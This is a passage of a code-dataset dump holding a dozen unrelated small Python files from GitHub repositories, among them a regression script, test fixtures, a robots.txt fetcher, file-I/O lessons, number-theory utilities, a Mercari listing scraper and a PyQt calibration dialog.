dest_file\n","repo_name":"amromics/amromics","sub_path":"amromics/utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6587,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"} +{"seq_id":"35469172042","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Sep 24 12:11:59 2021\r\n\r\n@author: CLaug\r\n\"\"\"\r\nimport pandas as pd\r\nimport os \r\nimport pickle\r\n\r\n# Import helper functions\r\nfrom model_helpers import perform_regression, regression_output, regression_output_comparison\r\n\r\npath = os.path.abspath(os.path.join(__file__ ,\"../../..\"))\r\n\r\nINPUTFILE = path + \"\\\\data\\\\processed\\\\processed_times.csv\"\r\nOUTPUTFILE = path + \"\\\\models\"\r\n\r\n## Read file to df\r\ndf = pd.read_csv(INPUTFILE, index_col=\"Unnamed: 0\")\r\n\r\n#%% Call the linear regression model\r\n\r\n# First with all predictors\r\ncols_to_drop = []\r\nols_pred1, ols_error1, model1 = perform_regression(df, cols_to_drop)\r\nregression_output(model1)\r\n# p<0.05 so we can conclude that our model performs better than other simpler model\r\n# t-values show that coefficients for month and time change since covid are not significantly different from 0\r\n\r\n# With significant predictors\r\ncols_to_drop = [\"Month\", \"Time (s) change since COVID\"]\r\nols_pred2, ols_error2, model2 = perform_regression(df, cols_to_drop)\r\nregression_output(model2)\r\n\r\n\r\n# Is model2 significantly better than model1?\r\nregression_output_comparison(model1, model2)\r\n# 0.382 < 5.991 so cannot reject the null hypothesis. \r\n# This means the full model and the nested model fit the data equally well. \r\n\r\n\r\n# Remove multicollinear predictors\r\ncols_to_drop = [\"Month\", \"Time (s) change since COVID\", \"Year\"]\r\nols_pred3, ols_error3, model3 = perform_regression(df, cols_to_drop)\r\nregression_output(model3)\r\n# All coefficients are signifcant\r\n\r\n# Is model3 significantly better than model1?\r\nregression_output_comparison(model1, model3)\r\n# 55.78>7.815 so can reject the null hypothesis. \r\n# Since model 1 has greater r squared, can conclude that model 1 is significantly better than model 3 at 95% confidence level. \r\n\r\n# Remove non-significant coefficients, as a result of removing year\r\ncols_to_drop = [\"Month\", \"Time (s) change since COVID\", \"Year\", \"Nation\", \"Name\"]\r\nols_pred4, ols_error4, model4 = perform_regression(df, cols_to_drop)\r\nregression_output(model4)\r\n\r\n# Is model4 significantly better than model3?\r\nregression_output_comparison(model3, model4)\r\n# 1759.26>110.89 so can reject the null hypothesis. \r\n# Since model 3 has greater r squared, can conclude that model 3 is significantly better than model 4 at 95% confidence level.\r\n\r\n# Choose model3\r\npickle.dump(model3, open(OUTPUTFILE + \"//linear_model.sav\", 'wb'))\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"connorrr81/Swimming-Predictions","sub_path":"src/model/fit_linear_model.py","file_name":"fit_linear_model.py","file_ext":"py","file_size_in_byte":2433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"29159577974","text":"from fixture import DataSet\nfrom .dummy import finance\n\nclass AccountData(DataSet):\n class membership_fee:\n name = u\"Mitgliedsbeiträge\"\n type = \"REVENUE\"\n\n\nclass PropertyGroupData(DataSet):\n class member:\n name = u\"Mitglied\"\n\n class network_access:\n name = u\"Netzwerkanschluss\"\n\n class away:\n # Although there is no `away` group known to the pycroft model\n # anymore, it is needed to test the `reduced_membership_fee`\n # logic. The whole thing is to be removed in the future,\n # anyway. See #28 on github.\n name = u\"Ausgezogen, Mail\"\n\n class violation:\n name = u\"Verstoß\"\n\n class cache:\n name = \"Cache\"\n\n class traffic_limit_exceeded:\n name = u\"Trafficlimit überschritten\"\n\n class payment_in_default:\n name = u\"Zahlungsrückstand\"\n\n class external:\n name = u\"Extern\"\n\n\nclass ConfigData(DataSet):\n class config:\n id = 1\n member_group = PropertyGroupData.member\n network_access_group = PropertyGroupData.network_access\n violation_group = PropertyGroupData.violation\n cache_group = PropertyGroupData.cache\n traffic_limit_exceeded_group = PropertyGroupData.traffic_limit_exceeded\n payment_in_default_group = PropertyGroupData.payment_in_default\n external_group = PropertyGroupData.external\n membership_fee_account = AccountData.membership_fee\n membership_fee_bank_account = finance.BankAccountData.dummy\n\nclass PropertyData(DataSet):\n class network_access:\n property_group = PropertyGroupData.member\n name = \"network_access\"\n granted = True\n\n class membership_fee:\n property_group = PropertyGroupData.member\n name = \"membership_fee\"\n granted = True\n\n class away:\n property_group = PropertyGroupData.away\n name = \"reduced_membership_fee\"\n granted = True\n\n class violation:\n property_group = PropertyGroupData.violation\n name = \"violation\"\n granted = True\n\n class violation_network_access_deny:\n property_group = PropertyGroupData.violation\n name = \"network_access\"\n granted = False\n\n class cache:\n property_group = PropertyGroupData.cache\n name = \"cache_access\"\n granted = False\n\n class traffic_limit_exceeded:\n property_group = PropertyGroupData.traffic_limit_exceeded\n granted = True\n name = \"traffic_limit_exceeded\"\n\n class payment_in_default:\n property_group = PropertyGroupData.payment_in_default\n name = \"payment_in_default\"\n granted = True\n\n class member:\n property_group = PropertyGroupData.member\n name = \"member\"\n granted = True\n","repo_name":"JuKu/pycroft","sub_path":"tests/fixtures/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"82"} +{"seq_id":"18442687916","text":"\r\n# Robots.txt determines that which pages of a website can a crawler crawl or not . \r\n# It sees for the url if it ends with \"/\" .If it does not , it adds \"/\" and then opens the robots.txt file\r\n# makes the encoding to Unicode Transformation format & reads data\r\n\r\nimport urllib.requests \r\nimport io \r\n\r\ndef robot_file(url):\r\n\tif url.endswith(\"/\"):\r\n\t\tpath = url\r\n\telse:\r\n\t\tpath = url + \"/\"\r\n\r\n\treq = urllib.request.urlopen(path + \"robots.txt\",data=NONE)\r\n\toutput = io.TextIOWrapper(req , encoding=\"UTF-8\")\r\n\treturn output.read()\r\n\tprint(\"Robots.txt is ready .\")\r\n\r\n","repo_name":"Pranav63/Wall-E-of-Websites","sub_path":"robotsTXT.py","file_name":"robotsTXT.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"} +{"seq_id":"18443519045","text":"file = open('text.txt', 'r')\nprint(file.read()) # читает весь текст\n\nprint(file.read(4)) # читает по символам\n\nprint(file.readline()) # читает первую строку\nprint(file.readline())# читает вторую строку\n\n# ИЛИ\n\nfor line in file:\n print(line)\n\n#----------\n\nfile.close() #закрыть файл когда закончили с ним работать\n\n#----------\n\nfile = open('text.txt', 'a') # добавить в файл (a = append)\nfile = open('text.txt', 'w') # писать в файл (w = write)\nfile = open('text.txt', 'x') # создать файл\n\n#----------\n\n#создать, написать, прочесть\nfile = open('test_1.txt', 'w')\nfile.write('my super text')\nfile.close()\nfile = open('test_1.txt', 'r')\nprint(file.read())\nfile.close()\n\n#----------\n\nwith open('test_1.txt', 'r') as file: # with закроет файл сам\n print(file.read(4))\n\n#----------\n\nwith open('test_1.log', 'w') as file: # создаем лог файл\n file.write('my first log file')\n\n#----------\n\nfile = open('texttext.txt', 'w')\nfile.write('this is my texttext',)\nfile.close()\nfile = open('texttext.txt', 'r')\nprint(file.read())\nfile.close()\n\n# или\nwith open('texttext.txt', 'r') as file:\n print(file.read())\n\n#----------\n\nfile = open('texttexttext.txt', 'w')\nfile.write('Hello, Python! Lesson 7')\nfile.close()\nfile = open('texttexttext.txt', 'r')\nprint(file.read())\nfile.close()\n\nfile = open('texttexttext.txt')\nmy_string = file.read()\nprint(my_string)\nmy_new_string = my_string.replace('e', '0')\nprint(my_new_string)\nfile.close()\nfile = open('texttexttext.txt', 'w')\nfile.write(my_new_string)\nfile.close()\n\n#----------\n\nmy_file = open('text.txt','r')\n\nprint(my_file.read())\nprint(my_file.readline())\nprint(my_file.readline())\n\nprint(my_file.readlines())\nprint(my_file.readline(3)) # 3 символа\nprint(my_file.read(3))\n\nfor i in my_file:\n print(i)\n\nmy_file.close()\n\n#----------\n\nmy_file = open('text2.txt', \"a\") # a = append,т дозаписывает, добавляет.\nmy_file.write('\\n my 3 text')\nmy_file.close()\nmy_file = open('text2.txt', 'r')\nprint(my_file.read())\nmy_file.close()\n\n#----------\n\nmy_file = open('text3.txt', 'x') #х создает файл\nmy_file.write('some text')\nmy_file.close()\nmy_file = open('text3.txt', 'r')\nprint(my_file.read())\nmy_file.close()\n\n#----------\n\nimport os #удалить файл\n\nmy_file = open('text4.txt', \"a\")\nmy_file.write('\\n my 3 text')\nmy_file.close()\nmy_file = open('text4.txt', 'r')\nprint(my_file.read())\nmy_file.close()\n\nos.remove('text4.txt') #удалить файл\n\n#----------\n\n\n","repo_name":"juliadigrigorio/QA_for_Everyone_4","sub_path":"file.py","file_name":"file.py","file_ext":"py","file_size_in_byte":2646,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"26821099197","text":"#Author: Mohit Patel #Author: Mohit Patel\n#Date: September 29, 2014\n#Purpose: To create a program that will produce various number theories\n# based on two given inputs.\n#--------------------------------------------------------------------------#\n\n#Author: Mohit Patel\n#Date: September 29, 2014\n#Purpose: To return a valid positive integer in the given range.\n#Parameters: The smallest and largest number outside the range of integers allowed.\n#Return Value: A positive integer within the given range.\n\ndef getPositiveInteger (low = 0, high = 100):\n \n blnInRange = False\n strNumber = input(\"Please enter a positive number in the range \"+str(low)+\" to \"+str(high)+ \": \")\n while blnInRange == False or strNumber.isdigit() == False:\n if strNumber.isdigit() == False:\n print(\"Your number is not a valid integer.\")\n strNumber = input(\"Please re-enter an appropriate integer in the range \"+str(low)+\" to \"+str(high)+ \": \")\n elif int(strNumber) < low or int(strNumber) > high:\n print(\"Your number is outside of the range \" + str(low) + \" to \" + str(high)+\".\")\n blnInRange = False\n strNumber = input(\"Please re-enter an appropriate integer in the range \"+str(low)+\" to \"+str(high)+ \": \")\n else:\n blnInRange = True\n number = int(strNumber)\n return number\n\n#--------------------------------------------------------------------------#\n\n#Author: Mohit Patel \n#Date: September 29, 2014\n#Purpose: To calculate the factorial of the given integer.\n#Parameters: The integer which will have it's factorial calculated.\n#Return Value: The factorial of the integer.\n\ndef calcFactorial (integer):\n \n count = 1\n factorial = 1\n for count in range(1, integer + 1):\n factorial = factorial * count\n \n return factorial\n\n#--------------------------------------------------------------------------#\n\n#Author: Mohit Patel \n#Date: September 29, 2014\n#Purpose: To calculate the amount of permutations in a given pair of integers.\n#Parameters: Two integers.\n#Return Value: The amount of permutations of the two integers.\n\ndef calcPermutations (n, r):\n\n#Flips the values of inputs if they are in an incorrect order.\n equalizer = n\n\n if n < r:\n n = r\n r = equalizer\n\n permutation = (calcFactorial(n)) / calcFactorial(n-r)\n\n return permutation\n\n#--------------------------------------------------------------------------#\n\n#Author: Mohit Patel \n#Date: September 29, 2014\n#Purpose: To calculate the amount of combinations in a given pair of integers.\n#Parameters: Two integers.\n#Return Value: The amount of combinations of the two integers.\n\ndef calcCombinations (n, r):\n\n#Flips the values of inputs if they are in an incorrect order.\n equalizer = n\n\n if n < r:\n n = r\n r = equalizer\n \n combinations = calcFactorial(n)/((calcFactorial(r))*(calcFactorial(n-r)))\n\n return combinations\n\n#--------------------------------------------------------------------------#\n\n#Author: Mohit Patel \n#Date: September 29, 2014\n#Purpose: To calculate the greatest common denominator of two given integers.\n#Parameters: Two integers.\n#Return Value: The greatest common denominator of those two integers. \n\ndef calcGCD (m, n):\n\n if n == 0:\n if m == 0:\n return 0\n else:\n return m\n else:\n t = m % n\n while not (t == 0):\n m = n\n n = t\n t = m % n\n return n\n\n#--------------------------------------------------------------------------#\n\n#Author: Mohit Patel \n#Date: September 29, 2014\n#Purpose: To calculate the lowest common multiple of two given integers.\n#Parameters: Two integers.\n#Return Value: The lowest common multiple of those two integers.\n\ndef calcLCM (m,n):\n lcm = 0\n if calcGCD(m,n) == 0:\n return lcm\n else:\n lcm = (m * n) / calcGCD(m, n)\n return int(lcm)\n\n#--------------------------------------------------------------------------#\n\n#Author: Mohit Patel \n#Date: September 29, 2014\n#Purpose: To state if two given numbers are relatively prime.\n#Parameters: Two integers.\n#Return Value: The boolean \"True\" or \"False\".\n\ndef isRelativelyPrime (m,n):\n\n if calcGCD(m,n) == 1:\n prime = True\n else:\n prime = False\n return prime\n\n#--------------------------------------------------------------------------#\n\n#Main.\nagain = \"Y\"\nlow = 0\nhigh = 100\n\n#Re-executes program.\nwhile again == \"y\" or again == \"Y\":\n\n # Returns two valid integers.\n print(\"Enter your first positive integer.\")\n integer1 = getPositiveInteger(low,high)\n print(\"Now, enter a second positive integer.\")\n integer2 = getPositiveInteger(low,high)\n\n print()\n print()\n print(\"The amount of permutations of this pair of integers is\", str(calcPermutations(integer1, integer2))+\".\")\n print(\"The amount of combinations of this pair of integers is\", str(calcCombinations(integer1,integer2))+\".\")\n #Ensures no GCD of 0.\n if calcGCD(integer1, integer2) == 0:\n print(\"The GCD of these numbers is undefined.\")\n else:\n print(\"The GCD of these numbers is\", str(calcGCD(integer1,integer2))+\".\")\n print(\"The LCM of these numbers is\", str(calcLCM(integer1,integer2))+\".\")\n if isRelativelyPrime(integer1, integer2) == True:\n print(\"These numbers are also relatively prime!\")\n print()\n print()\n\n again = input(\"Would you like to calculate another pair of numbers? (Y/N):\")\n while not(again == \"Y\" or again == \"y\" or again == \"N\" or again == \"n\"):\n again = input(\"Please re-enter if you would like to calculate another pair of numbers. (Y/N):\")\n \nprint(\"Have a nice day!\")\n","repo_name":"omnivaliant/High-School-Coding-Projects","sub_path":"ICS3U1/Assignment #3 Functions/Number Theory.py","file_name":"Number Theory.py","file_ext":"py","file_size_in_byte":6543,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"} +{"seq_id":"35932341708","text":"def sumprime(min,max):\n sum=0\n for i in range(min,max):\n if i>1:\n for j in range(2,i):\n if i%j==0:\n break\n else:\n sum=sum+i\n return(sum)\nprint(sumprime(1,10))","repo_name":"akhilakr06/pythonluminar","sub_path":"Basic_test/min_max.py","file_name":"min_max.py","file_ext":"py","file_size_in_byte":253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"32260548104","text":"TAKEN_SEAT = \"*\"\nDIRECTIONS = {\n \"A\": (-1, 0), # Above\n \"R\": (0, 1), # Right\n \"L\": (0, -1), # Left\n \"B\": (1, 0), # Below\n}\n\n\ndef get_cinema_layout(cinema_layout):\n # list of strings -> nested list\n return [list(line) for line in cinema_layout]\n\n\ndef get_friends_relative_positions(friends_configuration):\n # create dict and add center name's position\n center_friend = friends_configuration.pop(0)\n dd = {center_friend: (0, 0)}\n for config in friends_configuration:\n name_to_write, direction, name_to_check = config\n # sum the elements of tuples: (delta_x + previous_x, delta_y + previous_y)\n # and write the position for the given name related to the center name\n zip_direction_to_position = zip(DIRECTIONS[direction], dd.get(name_to_check))\n calc_position = map(sum, zip_direction_to_position)\n dd[name_to_write] = tuple(calc_position)\n return dd\n\n\ndef is_invalid_position(mat, r, c):\n max_r = len(mat) - 1\n max_c = len(mat[0]) - 1\n return any((r > max_r, c > max_c, r < 0, c < 0))\n\n\ndef place_names_in_matrix(cinema, deltas, row, col):\n new_layout = get_cinema_layout(cinema)\n # iterate through friends relative positions\n for name, (delta_r, delta_c) in deltas.items():\n # calculate new coordinates\n new_r = row + delta_r\n new_c = col + delta_c\n if is_invalid_position(cinema, new_r, new_c):\n return\n if new_layout[new_r][new_c] == TAKEN_SEAT:\n return\n # place name at position if it is valid\n new_layout[new_r][new_c] = name\n # if the iterations are completed this is valid formation\n return new_layout\n\n\ndef stranger_forms(cinema_layout, friends_configuration):\n possible = []\n friends_deltas = get_friends_relative_positions(friends_configuration)\n\n for row_index, row in enumerate(cinema_layout):\n for col_index, element in enumerate(row):\n\n if element == TAKEN_SEAT:\n continue\n\n new_layout = place_names_in_matrix(cinema_layout, friends_deltas, row_index, col_index)\n\n if new_layout is not None:\n # convert list back to string and append the valid formation to the result\n new_layout = [\"\".join(r) for r in new_layout]\n possible.append(new_layout)\n\n return possible\n\n\n# ____TEST____\ntest_cinema_layout = [\n '..*...*.**',\n '.....**...',\n '*.*...*..*',\n '.**....*.*',\n '...*..*.*.',\n '.***...*..',\n '*......*.*',\n '.....**..*',\n '..*.*.*..*',\n '***.*.**..',\n]\ntest_friends_configuration = [\"A\", \"BAA\", \"FRA\", \"CAB\", \"DRC\", \"EAD\", \"GLE\"]\npossible_configurations = stranger_forms(test_cinema_layout, test_friends_configuration)\n\nfor configuration in possible_configurations:\n for line in configuration:\n print(line)\n print()\n","repo_name":"ivo-bass/Python-101-Forever","sub_path":"C01/C01P19 - Stranger forms/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":2860,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"82"} +{"seq_id":"28296324613","text":"from pathlib import Path\n\nfrom hylfm.checkpoint import TrainRunConfig\nfrom hylfm.hylfm_types import DatasetChoice\n\n\ndef get_config_for_old_checkpoint(checkpoint: Path) -> TrainRunConfig:\n dataset = None\n if checkpoint.name in [\n \"v1_checkpoint_498_MS_SSIM=0.9710696664723483.pth\", # heart stat\n \"v1_checkpoint_MSSSIM=0.6722144321961836.pth\",\n \"v1_checkpoint_27500_ms_ssim-scaled=0.8430055000565269.pth\",\n \"v1_checkpoint_37400_ms_ssim-scaled=0.8433429219506003.pth\", # repos/hylfm-net/logs/train/heart/fake_dyn/from_scratch/21-01-12_21-05-48\n \"v1_checkpoint_28200_ms_ssim-scaled=0.8401095325296576.pth\",\n \"v1_checkpoint_37500_ms_ssim-scaled=0.8358002250844782.pth\",\n \"v1_checkpoint_0_ms_ssim-scaled=0.8727825609120455.pth\",\n \"v1_checkpoint_9900_ms_ssim-scaled=0.8582265810533003.pth\",\n \"v1_checkpoint_6600_ms_ssim-scaled=0.9658018271759073.pth\", # refined old stat on fish2 dyn refine\n ]:\n model_config = {\n \"nnum\": 19,\n \"z_out\": 49,\n \"kernel2d\": 3,\n \"c00_2d\": 488,\n \"c01_2d\": 488,\n \"c02_2d\": None,\n \"c03_2d\": None,\n \"c04_2d\": None,\n \"up0_2d\": 244,\n \"c10_2d\": 244,\n \"c11_2d\": None,\n \"c12_2d\": None,\n \"c13_2d\": None,\n \"c14_2d\": None,\n \"up1_2d\": None,\n \"c20_2d\": None,\n \"c21_2d\": None,\n \"c22_2d\": None,\n \"c23_2d\": None,\n \"c24_2d\": None,\n \"up2_2d\": None,\n \"c30_2d\": None,\n \"c31_2d\": None,\n \"c32_2d\": None,\n \"c33_2d\": None,\n \"c34_2d\": None,\n \"last_kernel2d\": 1,\n \"cin_3d\": 7,\n \"kernel3d\": 3,\n \"c00_3d\": 7,\n \"c01_3d\": None,\n \"c02_3d\": None,\n \"c03_3d\": None,\n \"c04_3d\": None,\n \"up0_3d\": 7,\n \"c10_3d\": 7,\n \"c11_3d\": 7,\n \"c12_3d\": None,\n \"c13_3d\": None,\n \"c14_3d\": None,\n \"up1_3d\": None,\n \"c20_3d\": None,\n \"c21_3d\": None,\n \"c22_3d\": None,\n \"c23_3d\": None,\n \"c24_3d\": None,\n \"up2_3d\": None,\n \"c30_3d\": None,\n \"c31_3d\": None,\n \"c32_3d\": None,\n \"c33_3d\": None,\n \"c34_3d\": None,\n \"init_fn\": \"xavier_uniform\",\n \"final_activation\": None,\n }\n elif checkpoint.name in [\n \"v1_checkpoint_SmoothL1Loss=-0.00012947025970788673.pth\",\n \"small_beads_v1_weights_SmoothL1Loss%3D-0.00012947025970788673.pth\",\n ]: # beads f8\n dataset = DatasetChoice.beads_highc_a\n model_config = {\n \"nnum\": 19,\n \"z_out\": 51,\n \"kernel2d\": 3,\n \"c00_2d\": 976,\n \"c01_2d\": 976,\n \"c02_2d\": None,\n \"c03_2d\": None,\n \"c04_2d\": None,\n \"up0_2d\": 488,\n \"c10_2d\": 488,\n \"c11_2d\": None,\n \"c12_2d\": None,\n \"c13_2d\": None,\n \"c14_2d\": None,\n \"up1_2d\": 244,\n \"c20_2d\": 244,\n \"c21_2d\": None,\n \"c22_2d\": None,\n \"c23_2d\": None,\n \"c24_2d\": None,\n \"up2_2d\": None,\n \"c30_2d\": None,\n \"c31_2d\": None,\n \"c32_2d\": None,\n \"c33_2d\": None,\n \"c34_2d\": None,\n \"last_kernel2d\": 1,\n \"cin_3d\": 7,\n \"kernel3d\": 3,\n \"c00_3d\": 7,\n \"c01_3d\": None,\n \"c02_3d\": None,\n \"c03_3d\": None,\n \"c04_3d\": None,\n \"up0_3d\": 7,\n \"c10_3d\": 7,\n \"c11_3d\": 7,\n \"c12_3d\": None,\n \"c13_3d\": None,\n \"c14_3d\": None,\n \"up1_3d\": None,\n \"c20_3d\": None,\n \"c21_3d\": None,\n \"c22_3d\": None,\n \"c23_3d\": None,\n \"c24_3d\": None,\n \"up2_3d\": None,\n \"c30_3d\": None,\n \"c31_3d\": None,\n \"c32_3d\": None,\n \"c33_3d\": None,\n \"c34_3d\": None,\n \"init_fn\": \"xavier_uniform\",\n \"final_activation\": None,\n }\n\n elif checkpoint.name == \"v1_checkpoint_SmoothL1Loss=-0.00016112386947497725.pth\": # beads f4\n model_config = {\n \"nnum\": 19,\n \"z_out\": 51,\n \"kernel2d\": 3,\n \"c00_2d\": 488,\n \"c01_2d\": 488,\n \"c02_2d\": None,\n \"c03_2d\": None,\n \"c04_2d\": None,\n \"up0_2d\": 244,\n \"c10_2d\": 244,\n \"c11_2d\": None,\n \"c12_2d\": None,\n \"c13_2d\": None,\n \"c14_2d\": None,\n \"up1_2d\": None,\n \"c20_2d\": None,\n \"c21_2d\": None,\n \"c22_2d\": None,\n \"c23_2d\": None,\n \"c24_2d\": None,\n \"up2_2d\": None,\n \"c30_2d\": None,\n \"c31_2d\": None,\n \"c32_2d\": None,\n \"c33_2d\": None,\n \"c34_2d\": None,\n \"last_kernel2d\": 1,\n \"cin_3d\": 7,\n \"kernel3d\": 3,\n \"c00_3d\": 7,\n \"c01_3d\": None,\n \"c02_3d\": None,\n \"c03_3d\": None,\n \"c04_3d\": None,\n \"up0_3d\": 7,\n \"c10_3d\": 7,\n \"c11_3d\": 7,\n \"c12_3d\": None,\n \"c13_3d\": None,\n \"c14_3d\": None,\n \"up1_3d\": None,\n \"c20_3d\": None,\n \"c21_3d\": None,\n \"c22_3d\": None,\n \"c23_3d\": None,\n \"c24_3d\": None,\n \"up2_3d\": None,\n \"c30_3d\": None,\n \"c31_3d\": None,\n \"c32_3d\": None,\n \"c33_3d\": None,\n \"c34_3d\": None,\n \"init_fn\": \"xavier_uniform\",\n \"final_activation\": None,\n }\n else:\n raise NotImplementedError(checkpoint)\n\n return TrainRunConfig(\n batch_multiplier=1,\n batch_size=1,\n crit_apply_weight_above_threshold=None,\n crit_beta=None,\n crit_decay_weight_by=None,\n crit_decay_weight_every_unit=None,\n crit_decay_weight_every_value=None,\n crit_decay_weight_limit=None,\n crit_ms_ssim_weight=None,\n crit_threshold=None,\n crit_weight=None,\n criterion=None,\n data_range=1.0,\n dataset=dataset,\n eval_batch_size=1,\n interpolation_order=2,\n lr_sched_factor=None,\n lr_sched_patience=None,\n lr_sched_thres=None,\n lr_sched_thres_mode=None,\n lr_scheduler=None,\n max_epochs=None,\n model=model_config,\n model_weights=checkpoint,\n opt_lr=None,\n opt_momentum=None,\n opt_weight_decay=None,\n optimizer=None,\n patience=None,\n save_output_to_disk=None,\n score_metric=None,\n seed=None,\n validate_every_unit=None,\n validate_every_value=None,\n win_sigma=1.5,\n win_size=11,\n hylfm_version=\"0.0.0\",\n point_cloud_threshold=1.0,\n )\n","repo_name":"kreshuklab/hylfm-net","sub_path":"hylfm/load_old_checkpoint.py","file_name":"load_old_checkpoint.py","file_ext":"py","file_size_in_byte":7152,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"82"} +{"seq_id":"4762574646","text":"class Solution:\n def divisorGame(self, N: int) -> bool:\n @lru_cache(None)\n def dfs(n):\n if n == 1:\n return False\n res = False\n for i in range(1, n):\n if n % i == 0:\n res |= not dfs(n - i)\n return res\n \n return dfs(N)\n\n'''\nhttps://leetcode.com/problems/divisor-game/discuss/274566/just-return-N-2-0-(proof)\n\nprove it by two steps:\n\nif Alice will lose for N, then Alice will must win for N+1, since Alice can first just make N decrease 1.\nfor any odd number N, it only has odd factor, so after the first move, it will be an even number\nlet's check the inference\nfisrt N = 1, Alice lose. then Alice will must win for 2.\nif N = 3, since all even number(2) smaller than 3 will leads Alice win, so Alice will lose for 3\n3 lose -> 4 win\nall even number(2,4) smaller than 5 will leads Alice win, so Alice will lose for 5\n...\n\nTherefore, Alice will always win for even number, lose for odd number.\n\n'''\nclass Solution2:\n def divisorGame(self, N: int) -> bool:\n return N % 2 == 0","repo_name":"KOPFYF/LCEveryday","sub_path":"Dynamic Programming/minimax/divisorGame1025.py","file_name":"divisorGame1025.py","file_ext":"py","file_size_in_byte":1103,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"28810733396","text":"import csv\nfrom .notification import notify\nfrom .mercari_driver import MercariDriver, get_scrapper_driver\nfrom .input import Input\n\n\n\ndef main():\n \n \n # create an input (1 or 2) to select if the program needs manual input or text file input\n\n while True:\n try:\n input_type = int(\n input(\"[1]: Introducción manual de datos \\n[2]: Introducción desde input.csv:\\n\"))\n if input_type == 1:\n input_class = Input()\n input_class.set_MERCARI_URL()\n input_class.set_QUANTITY()\n input_class.set_PRODUCT_CATEGORY()\n input_class.set_INTEREST_RATE()\n input_class.set_TRANS_LANG()\n \n MERCARI_URL = input_class.get_MERCARI_URL()\n QUANTITY = input_class.get_QUANTITY()\n PRODUCT_CATEGORY = input_class.get_PRODUCT_CATEGORY()\n INTEREST_RATE = input_class.get_INTEREST_RATE()\n TRANS_LANG = input_class.get_TRANS_LANG()\n \n driver = get_scrapper_driver()\n m_scrapper = MercariDriver(driver)\n m_scrapper.move_page(MERCARI_URL)\n\n\n latest_item_url_list = m_scrapper.get_items_url(quantity=QUANTITY)\n\n for item_url in latest_item_url_list:\n\n m_scrapper.move_page(item_url)\n item_name, item_price, item_description = m_scrapper.get_name_and_price()\n if item_name is None or item_price is None or item_description is None:\n continue\n \n notify(item_url, item_name, item_price, item_description, TRANS_LANG, INTEREST_RATE, PRODUCT_CATEGORY)\n\n driver.close()\n driver.quit()\n\n break\n elif input_type == 2:\n \n #read input.csv file, ignore first line.\n #enumerate the lines and assign the values to the variables\n driver = get_scrapper_driver()\n\n with open('input.csv') as csv_file:\n csv_reader = csv.reader(csv_file, delimiter=',')\n line_count = 0\n #create a for loop for row in csv_reader\n \n \n for row in csv_reader:\n \n \n if line_count == 0:\n #print(f'Column names are {\", \".join(row)}')\n line_count += 1\n else:\n print(f'\\tPalabra clave: {row[0]} Nº productos: {row[1]} Categoría: {row[2]} Tasa de interés: {row[3]} Idioma: {row[4]}.')\n \n\n \n MERCARI_URL = \"https://jp.mercari.com/search?keyword=\" + row[0]\n QUANTITY = int(row[1])\n PRODUCT_CATEGORY = row[2]\n INTEREST_RATE = float(row[3])\n TRANS_LANG = row[4]\n \n m_scrapper = MercariDriver(driver)\n\n m_scrapper.move_page(MERCARI_URL)\n\n\n latest_item_url_list = m_scrapper.get_items_url(quantity=QUANTITY)\n\n for item_url in latest_item_url_list:\n \n m_scrapper.move_page(item_url)\n item_name, item_price, item_description = m_scrapper.get_name_and_price()\n\n if item_name is None or item_price is None or item_description is None:\n print(\"No se ha podido obtener el nombre, precio o descripción del producto\")\n continue\n \n notify(item_url, item_name, item_price, item_description, TRANS_LANG, INTEREST_RATE, PRODUCT_CATEGORY)\n\n \n line_count += 1\n \n \n print(f'Procesadas {line_count-1} entradas.')\n driver.close()\n driver.quit()\n\n break\n \n \n else:\n print(\"Por favor, introducir 1 o 2!!!\")\n continue\n except ValueError:\n print(\"Por favor, introducir un número y no letra!!!\")\n continue\n\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"alexanderbkl/mercari_crawler","sub_path":"scrapper/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4651,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"3591606711","text":"# -*- coding: utf-8 -*-\n# author: Joy Wang\n#\n# update time : 03/16/2017\n#\n# the module is to initalize the cal_window\n\nimport os\nimport sys\nfrom PyQt4.Qt import *\nfrom qgis.gui import *\nfrom PyQt4 import QtGui\nimport xlrd\nimport xlwt\nimport numpy as np\nimport cal_window\nimport selectSheet\n\ntry:\n _fromUtf8 = QtCore.QString.fromUtf8\nexcept AttributeError:\n def _fromUtf8(s):\n return s\n\nguiPath = os.getcwd()\nsys.path.append(guiPath)\n\n\nclass CalWindow(QDialog, cal_window.Ui_Dialog):\n def __init__(self):\n super(CalWindow,self).__init__()\n self.setupUi(self)\n self._select_sheets = []\n self.column_1s = None\n self.column_2s_1 = None\n self.column_2s_2 = None\n self.element = self._readConfig()\n\n def openPara(self):\n u'''\n 打开参数表格,同时连接到lineedit\n :return:\n '''\n para_path = QFileDialog.getOpenFileName(self, u\"打开参数表格\", guiPath, \"table(*.xls)\")\n self.lineEdit.setText(para_path)\n\n def openData(self):\n u'''\n 打开待校准文件\n :return:\n '''\n data_path = QFileDialog.getOpenFileName(self, u\"打开待校准数据表格\", guiPath, \"table(*.xls)\")\n self.lineEdit_2.setText(data_path)\n\n def openparafile(self):\n u'''\n 读取参数文件,同时设置下面输出按钮的able性\n :return:\n '''\n para_path = self.lineEdit.text()\n if os.path.isfile(para_path):\n self._para_data = xlrd.open_workbook(para_path)\n element_para = self._para_data.sheet_names()\n for i in self.element:\n if not i in element_para:\n 